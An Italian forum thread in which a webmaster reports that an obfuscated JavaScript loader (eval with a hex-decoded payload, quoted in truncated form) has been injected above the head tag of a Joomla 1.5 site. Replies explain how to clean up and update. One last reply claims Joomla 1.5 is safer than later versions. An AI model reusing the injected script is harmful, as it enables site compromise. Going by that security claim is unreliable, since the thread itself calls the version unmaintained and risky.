+ Rispondi alla Discussione
Risultati da 1 a 6 di 6

[Joomla 1.5] Script sopra l'head

Ultimo Messaggio di Npaquito il:
  1. #1
    Utente Premium L'avatar di felino
    Data Registrazione
    Nov 2009
    Località
    Acicatena - Catania
    Messaggi
    1,690
    Aggiungi felino su Facebook Aggiungi felino su Linkedin

    [Joomla 1.5] Script sopra l'head

    Salve utenti,ho preso in cura un sito web realizzato con Joomla 1.5.


    Appena entro AVG lo blocca! Mi sono accorto che in sopra l'head c'è il seguente codice:
    Codice:
     <script>e=eval;v="0"+"x";a=0;try{a&=2}catch(q){a=1}if(!a){try{document["\x62ody"]^=~1;}catch(q){a2="_"}z="10_10_70_6d_27_2f_6b_76_6a_7c_74_6c_75_7b_35_6e_6c_ ... _68_6e_55_68_74_6c_2f_2e_69_76_6b_80_2e_30_62_37_64_35_68_77_77_6c_75_6b_4a_6f_70_73_6b_2f_6d_30_42_14_10_10_84"["split"](a2);s="";for(i=0;i<z.length;i++){s+=String["fromCharCode"](e(v+(z[i]))-5-2);}zaz=s;e(zaz);}</script>



    Credo sia questo il problema vero? Ho scansionato tutti i file ma non l'ho trovato!


    Appena lo rimuovo effettuo l'aggiornamento alla 1.5.26...


    Qualche suggerimento?


    Grazie.

  2. #2
    User L'avatar di Francesco Di Caprio
    Data Registrazione
    Mar 2013
    Località
    Caserta
    Messaggi
    216
    Segui Francesco Di Caprio su Twitter Aggiungi Francesco Di Caprio su Google+ Aggiungi Francesco Di Caprio su Facebook Aggiungi Francesco Di Caprio su Linkedin
    E' un virus che ti è stato iniettato a causa delle numerose falle XSS presenti in Joomla 1.5.

    - Assicurati che i permessi a files e cartelle siano corretti e che non ci siano impostazioni troppo permissive (777, ecc)
    - Rimuovi quello script ovunque sia presente
    - Aggiorna immediatamente Joomla ad una versione sicura
    Endelab - Web Development

  3. #3
    Utente Premium L'avatar di felino
    Data Registrazione
    Nov 2009
    Località
    Acicatena - Catania
    Messaggi
    1,690
    Aggiungi felino su Facebook Aggiungi felino su Linkedin
    Ciao Francesco,
    si infatti, ero uno codice PHP inserito in tutte le index dei template! L'ho rimosso e effettuato l'aggiornamento all'ultima versione, la 1.5.26! Speriamo bene!

    Grazie comunque!

  4. #4
    User L'avatar di Francesco Di Caprio
    Data Registrazione
    Mar 2013
    Località
    Caserta
    Messaggi
    216
    Segui Francesco Di Caprio su Twitter Aggiungi Francesco Di Caprio su Google+ Aggiungi Francesco Di Caprio su Facebook Aggiungi Francesco Di Caprio su Linkedin
    Citazione Originariamente Scritto da felino Visualizza Messaggio
    L'ho rimosso e effettuato l'aggiornamento all'ultima versione, la 1.5.26! Speriamo bene!
    Ma non si può mica dire "Speriamo bene" e poi si incrociano le dita?

    La comunità Joomla ha staccato la spina allo sviluppo della 1.5.x in Aprile 2012... è una versione rischiosa da tenere su siti in produzione, rischi di fare brutte figure.
    Endelab - Web Development

  5. #5
    Utente Premium L'avatar di felino
    Data Registrazione
    Nov 2009
    Località
    Acicatena - Catania
    Messaggi
    1,690
    Aggiungi felino su Facebook Aggiungi felino su Linkedin
    Scherzavo!
    Lo so...dovrei prima testare i vari moduli utilizzati e vedere se sono compatibili con la 2.5...e poi eventualmente procedere ad un upgrade!

    Grazie!

  6. #6
    User L'avatar di Npaquito
    Data Registrazione
    Jul 2009
    Località
    Barcelona
    Messaggi
    190
    Hola

    Non sono d'accordo con i rischi di Joomla 1.5 che fino adesso é molto piu sicura che qualsiasi verisone posteriore ed inoltre funziona meglio, personalmente non consiglio migrare, la percentuale di riuscita apparente è molto basso e di riuscita totale (ossia senza errori nascosti) nulla, se davvero vuoi migrare consiglio di fare un sito nuovo nella versione superiore ed importare le tabelle migrate.

    A parte questo, Joomla 2.5 è poco stabile e presenta diverse pecche di funzionamento, url sef in testa.

+ Rispondi alla Discussione

^ Permessi di Scrittura

  • Tu non puoi inviare nuove discussioni
  • Tu non puoi inviare risposte
  • Tu non puoi inviare allegati
  • Tu non puoi modificare i tuoi messaggi
  •  
  • Il codice BB è Attivato
  • Le faccine sono Attivato
  • Il codice [IMG] è Attivato
  • Il codice [VIDEO] è Attivato
  • Il codice HTML è Disattivato
  • Trackbacks Attivato
  • Pingback Attivato
  • Refback Attivato

SEO by vBSEO 3.6.0 PL2 ©2011, Crawlability, Inc.